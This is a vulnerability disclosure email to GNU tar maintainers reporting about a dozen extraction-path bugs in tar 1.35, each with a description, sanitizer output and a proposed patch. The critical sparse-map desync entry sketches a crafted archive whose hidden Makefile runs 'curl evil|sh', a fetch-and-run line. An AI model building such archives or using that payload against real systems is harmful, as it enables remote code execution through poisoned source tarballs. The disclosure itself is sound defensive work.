Subject: [SECURITY] 12 vulnerabilities in tar 1.35 extraction path,
including arbitrary file injection
Hi,
I found several security bugs in GNU tar 1.35 during a code audit
focused on the extraction path. The most severe one allows a crafted
archive to inject arbitrary files onto disk -- files that never appear
in "tar -t" output. A full RCE chain (injecting a Makefile) is
trivial to build on top of it.
I am attaching proposed patches and PoC archives for everything below.
I would be happy to work with you on getting these merged. I also
prepared Debian quilt patches and regression tests (nine .at files for
the GNU Autotest framework) that cover all of the bugs.
The bugs are listed below from most to least severe.
=== BUG #01 / #14 (CRITICAL) ===
Arbitrary file injection via PAX v0.1 sparse archive stream desync
Files: src/sparse.c:576-596, src/xheader.c
Impact: An attacker can inject files with arbitrary names, modes, and
content that are invisible to "tar -t". Full RCE is
demonstrated by injecting a Makefile into what looks like a
legitimate source tarball.
Description:
sparse_extract_file() (sparse.c:576) reads archive data blocks
according to the sparse map, not according to archive_file_size.
If an attacker sets archive_file_size smaller than the sum of all
sparse_map[i].numbytes, the extractor reads past the end of the
declared archive data into the headers and data of subsequent
archive members. This desynchronizes the archive stream: the
next call to read_header() interprets raw data as a tar header.
The attacker controls that data, so they can inject a fully
functional tar header for any file they want. The injected file
never appears in "tar -t" output because listing mode does not
trigger sparse extraction.
Concrete exploit scenario:
[PAX ext hdr: GNU.sparse.map=0,512,2048,512; sparse.size=4096]
[ustar hdr: .cache, size=512] <- archive_file_size=512
[512 bytes of .cache data] <- region 0 ok
[ustar hdr: .gitignore, size=0] <- consumed as region 1 data!
[ustar hdr: Makefile, size=80, mode=0755] <- injected member
[80 bytes: "all:\n\t@curl evil|sh\n"]
[end-of-archive]
$ tar -tf rce_chain.tar
project-1.0/
project-1.0/README.md
project-1.0/src/main.c
project-1.0/Makefile <- looks legitimate
$ tar -xf rce_chain.tar -C /tmp/build && make -C /tmp/build/project-1.0
[*] RCE achieved
Proposed fix:
After tar_sparse_decode_header() returns (sparse.c:593), sum all
sparse_map[i].numbytes and call FATAL_ERROR if the total exceeds
archive_file_size. FATAL_ERROR (not ERROR) is required because the
caller in extract.c ignores the return value and calls skim_file()
with an uninitialized size variable otherwise.
if (rc)
{
off_t total = 0;
for (i = 0; i < file.stat_info->sparse_map_avail; i++)
{
if (INT_ADD_OVERFLOW (total,
file.stat_info->sparse_map[i].numbytes))
FATAL_ERROR ((0, 0, _("%s: sparse map total exceeds archive
file size"),
st->orig_file_name));
total += file.stat_info->sparse_map[i].numbytes;
}
if (total > file.stat_info->archive_file_size)
FATAL_ERROR ((0, 0, _("%s: sparse map total exceeds archive file
size"),
st->orig_file_name));
}
=== BUG #02 (HIGH) ===
Overlapping OLDGNU sparse map entries cause silent data corruption
File: src/sparse.c:789-803 (oldgnu_add_sparse)
Impact: Silent file corruption. The extractor lseeks backward and
overwrites already-written data with content from a later
sparse region.
Description:
oldgnu_add_sparse() validates that individual offset and numbytes
values are non-negative and that offset+numbytes does not overflow,
but it never checks that the new entry does not overlap with the
previous one. An attacker can supply:
sp[0]: offset=0, numbytes=512
sp[1]: offset=256, numbytes=512
Region 1 overlaps region 0 at bytes 256-511. The extractor lseeks
to offset 256 and overwrites the first 256 bytes written by region 0.
Proposed fix:
Track the end of the previous entry and reject any new entry whose
offset falls below it:
if (file->stat_info->sparse_map_avail > 0)
{
struct sp_array *prev =
&file->stat_info->sparse_map[file->stat_info->sparse_map_avail - 1];
if (INT_ADD_OVERFLOW (prev->offset, prev->numbytes)
|| sp.offset < prev->offset + prev->numbytes)
return add_fail;
}
The same check is also needed in the PAX v0.0 and v0.1 decoders in
xheader.c (sparse_numbytes_decoder at line 1426 and sparse_map_decoder
at line 1480).
=== BUG #03 (HIGH) ===
Signed integer overflow in PAX v0.0/v0.1 sparse offset+numbytes
Files: src/xheader.c:1426 (sparse_numbytes_decoder)
src/xheader.c:1480 (sparse_map_decoder)
Impact: Signed 64-bit integer overflow in offset+numbytes arithmetic.
Undefined behavior that can corrupt internal state.
Description:
The PAX v1.0 decoder in sparse.c already checks:
if (INT_ADD_OVERFLOW (sp.offset, u))
...
But the PAX v0.0 and v0.1 decoders in xheader.c do not. A crafted
extended header with offset=9223372036854775800 and numbytes=100
passes individual range checks but overflows signed off_t when summed.
UBSan output:
xheader.c:1473: runtime error: signed integer overflow:
9223372036854775800 + 100 cannot be represented in type 'long int'
Proposed fix:
Add the same INT_ADD_OVERFLOW check after assigning numbytes in both
sparse_numbytes_decoder() and sparse_map_decoder(), and return early
with an error if the check fires.
=== BUG #04 (LOW) ===
FLEXNSIZEOF overflow in create_placeholder_file
File: src/extract.c:1444
Impact: Theoretical heap buffer overflow if link_name is near SIZE_MAX.
Description:
create_placeholder_file() computes:
xmalloc (FLEXNSIZEOF (struct delayed_link, target,
strlen (current_stat_info.link_name) + 1));
If strlen(link_name) is near SIZE_MAX, adding 1 overflows size_t, and
FLEXNSIZEOF computes a small allocation size. The subsequent strcpy
writes past the buffer. PAX extended headers allow arbitrarily long
linkpath values, so the attacker controls the length. In practice
this requires the system to have nearly SIZE_MAX bytes of memory
available, so it is mostly theoretical.
Proposed fix:
size_t link_len = strlen (current_stat_info.link_name);
if (SIZE_MAX - sizeof (struct delayed_link) <= link_len)
xalloc_die ();
=== BUG #05 (MEDIUM) ===
Memory leaks in delay_set_stat reuse path
File: src/extract.c:566-590 (delay_set_stat)
Impact: Unbounded memory leak; a crafted archive with repeated
directory entries and different xattrs can cause OOM.
Description:
When the same directory appears multiple times in an archive,
delay_set_stat() reuses the existing hash entry. But it overwrites
cntx_name (line 566), acls_a_ptr (line 571), acls_d_ptr (line 581),
and xattr_map (line 590) without freeing the old values first.
Additionally, for NEW entries (the else branch at line 537), cntx_name,
acls_a_ptr, and acls_d_ptr are not initialized to NULL. The memory is
allocated with xmalloc, so these fields contain garbage. If the
reuse path then calls free() on them, it frees garbage pointers.
Proposed fix:
On the reuse path, add free(data->cntx_name), free(data->acls_a_ptr),
free(data->acls_d_ptr), and xattr_map_free()+xattr_map_init() before
overwriting. On the new-entry path, initialize the three pointer
fields to NULL and the two length fields to 0.
=== BUG #06 (MEDIUM) ===
Shallow xattr_map copy -- dangling pointer / latent use-after-free
File: src/extract.c:996 (apply_nonancestor_delayed_set_stat)
Impact: Dangling pointer after the source is freed. Latent UAF
depending on how set_stat uses the xattr_map.
Description:
struct tar_stat_info sb;
...
sb.xattr_map = data->xattr_map; // line 996: shallow copy
set_stat (data->file_name, &sb, ...);
// data is freed shortly after, invalidating xattr_map.xattrs
The struct assignment copies the pointer, not the data. After
set_stat returns and data is freed, sb.xattr_map.xattrs is dangling.
Proposed fix:
Replace the shallow copy with a deep copy:
xattr_map_init (&sb.xattr_map);
xattr_map_copy (&sb.xattr_map, &data->xattr_map);
set_stat (...);
xattr_map_free (&sb.xattr_map);
=== BUG #07 (MEDIUM) ===
Uninitialized struct tar_stat_info on stack
File: src/extract.c:985 (apply_nonancestor_delayed_set_stat)
Impact: Use of uninitialized memory; detected by MSan.
Description:
struct tar_stat_info sb; // line 985: uninitialized
sb.stat.st_mode = data->mode; // only a few fields are set
...
set_stat (data->file_name, &sb, ...);
Fields like stat.st_size, stat.st_dev, dumpdir, sparse_map, etc.
retain garbage values from the stack.
MSan output:
WARNING: MemorySanitizer: use-of-uninitialized-value
#0 in set_stat (extract.c:990)
#1 in apply_nonancestor_delayed_set_stat (extract.c:999)
Proposed fix:
memset (&sb, 0, sizeof sb);
=== BUG #08 (MEDIUM) ===
Uninitialized struct tar_stat_info in apply_delayed_link
File: src/extract.c:1898 (apply_delayed_link)
Impact: Same as Bug #07 -- use of uninitialized memory.
Description:
struct tar_stat_info st1; // line 1898: uninitialized
st1.stat.st_mode = ds->mode;
...
set_stat (source, &st1, ...);
Same pattern as Bug #07 in a different function.
Proposed fix:
memset (&st1, 0, sizeof st1);
=== BUG #09 (MEDIUM) ===
strcmp overread past the non-NUL-terminated magic field
File: src/list.c:565, 632 (read_header, decode_header)
Impact: Buffer overread past the 6-byte magic field boundary.
Format misdetection with crafted headers.
Description:
strcmp (h->magic, TMAGIC) // line 565
strcmp (header->header.magic, TMAGIC) // line 632
TMAGIC is "ustar\0" (6 bytes including NUL). The magic field in the
header struct is exactly 6 bytes (char magic[6]). If the field
contains "ustar\x01" (no NUL terminator), strcmp reads past byte 5
into the adjacent version[2] and uname[32] fields until it finds a NUL.
ASan (with tight heap allocator) reports:
ERROR: AddressSanitizer: heap-buffer-overflow
READ of size 1 ... in __strcmp_sse42
Proposed fix:
memcmp (h->magic, TMAGIC, sizeof TMAGIC)
=== BUG #10 (MEDIUM) ===
Incomplete destructor for delayed_link_table hash entries
File: src/extract.c:1478 (create_placeholder_file)
Impact: Memory leak on hash collision/replacement.
Description:
hash_initialize (0, 0, dl_hash, dl_compare, free)
The destructor callback is just free(), which frees the top-level
struct delayed_link but not its sub-allocations: the sources linked
list, cntx_name, acls_a_ptr, acls_d_ptr, and xattr_map. When a hash
collision causes an old entry to be evicted, these are leaked.
Proposed fix:
Write a proper destructor:
static void
free_delayed_link (void *entry)
{
struct delayed_link *p = entry;
struct string_list *s, *next;
for (s = p->sources; s; s = next)
{
next = s->next;
free (s);
}
free (p->cntx_name);
free (p->acls_a_ptr);
free (p->acls_d_ptr);
xattr_map_free (&p->xattr_map);
free (p);
}
And pass free_delayed_link instead of free to hash_initialize.
=== BUG #11 (LOW) ===
Signed integer overflow in check_time
File: src/extract.c:364 (check_time)
Impact: Undefined behavior (signed overflow) with base-256 encoded
mtime values near INT64_MAX.
Description:
diff.tv_sec = t.tv_sec - now.tv_sec; // line 364
If t.tv_sec is a very large positive value (e.g. 2^62 - 1, encoded
in base-256 in the mtime field) and now.tv_sec is the current time,
the subtraction overflows signed time_t.
UBSan output:
extract.c:367: runtime error: signed integer overflow:
4611686018427387903 - 1708000000 cannot be represented in type 'long
int'
Proposed fix:
if (INT_SUBTRACT_OVERFLOW (t.tv_sec, now.tv_sec))
diff.tv_sec = TYPE_MAXIMUM (time_t);
else
diff.tv_sec = t.tv_sec - now.tv_sec;
=== BUG #12 (LOW) ===
Off-by-one when file_name_len is 0
File: src/extract.c:953 (apply_nonancestor_delayed_set_stat)
Impact: Read at index -1 when data->file_name_len is 0.
Description:
|| (data->file_name_len < file_name_len
&& file_name[data->file_name_len]
&& (ISSLASH (file_name[data->file_name_len])
|| ISSLASH (file_name[data->file_name_len - 1]))
If data->file_name_len is 0, the expression
file_name[data->file_name_len - 1] accesses file_name[(size_t)-1].
Proposed fix:
Add a guard: data->file_name_len > 0 && data->file_name_len < ...
=== BUG #13 (LOW) ===
Integer truncation in decode_record
File: src/xheader.c:630 (decode_record)
Impact: Implicit narrowing from ptrdiff_t to int; UBSan
-fsanitize=implicit-conversion fires.
Description:
int len_len = len_lim - p; // line 630
len_lim - p is ptrdiff_t. If the difference exceeds INT_MAX, the
implicit conversion to int wraps to a negative value. The value is
only used to format an error message, so the practical impact is
limited to a garbled diagnostic, but UBSan rightfully flags it.
Proposed fix:
int len_len = (int) (len_lim - p < 1000 ? len_lim - p : 1000);
This clamps the value to a reasonable range for the error message.
=== SUMMARY TABLE ===
# Severity File Function / Line Short description
-- -------- ----------- ---------------------------
--------------------------
01 CRITICAL sparse.c:593 sparse_extract_file Archive stream
desync -> file injection
14 CRITICAL (same root cause as #01) Full RCE chain
demo
02 HIGH sparse.c:803 oldgnu_add_sparse Overlapping
sparse regions -> corruption
03 HIGH xheader.c sparse_numbytes/map_decoder Missing
INT_ADD_OVERFLOW
04 LOW extract.c:1444 create_placeholder_file FLEXNSIZEOF
size_t overflow
05 MEDIUM extract.c:566 delay_set_stat Memory leak on
reuse path
06 MEDIUM extract.c:996 apply_nonancestor_delayed.. Shallow
xattr_map copy (UAF)
07 MEDIUM extract.c:985 apply_nonancestor_delayed.. Uninitialized
tar_stat_info
08 MEDIUM extract.c:1898 apply_delayed_link Uninitialized
tar_stat_info
09 MEDIUM list.c:565 read_header / decode_header strcmp past
magic field
10 MEDIUM extract.c:1478 create_placeholder_file Incomplete hash
destructor
11 LOW extract.c:364 check_time Signed overflow
in time diff
12 LOW extract.c:953 apply_nonancestor_delayed.. file_name_len=0
underflow
13 LOW xheader.c:630 decode_record ptrdiff_t -> int
truncation
=== REPRODUCTION ===
All bugs were confirmed on tar 1.35 (commit 8e3c8fa17 from
https://git.savannah.gnu.org/cgit/tar.git). Bugs #01, #02, and #14
are reproducible without sanitizers on any 64-bit Linux system. The
remaining bugs require ASan, UBSan, or MSan to observe.
Build with sanitizers:
# ASan + UBSan
CC=gcc CFLAGS="-g -O0 -fsanitize=address,undefined" \
LDFLAGS="-fsanitize=address,undefined" ./configure && make
# MSan (requires clang)
CC=clang CFLAGS="-g -O0 -fsanitize=memory
-fsanitize-memory-track-origins=2" \
LDFLAGS="-fsanitize=memory" ./configure && make
I can provide the PoC generator scripts and the complete patch if that
would be helpful.
Best regards,
Vahagn Vardanyan
--
[image: photo]
Vahagn Vardanian
Co-founder and Chief Technology Officer,
RedRays, Inc
[image: icon] +15645448507 <+37498553911> [image: icon] redrays.io
<https://redrays.io/> [image: icon] [email protected]
[image: icon] 1111B S Governors Ave STE 7629 Dover, DE 19904 US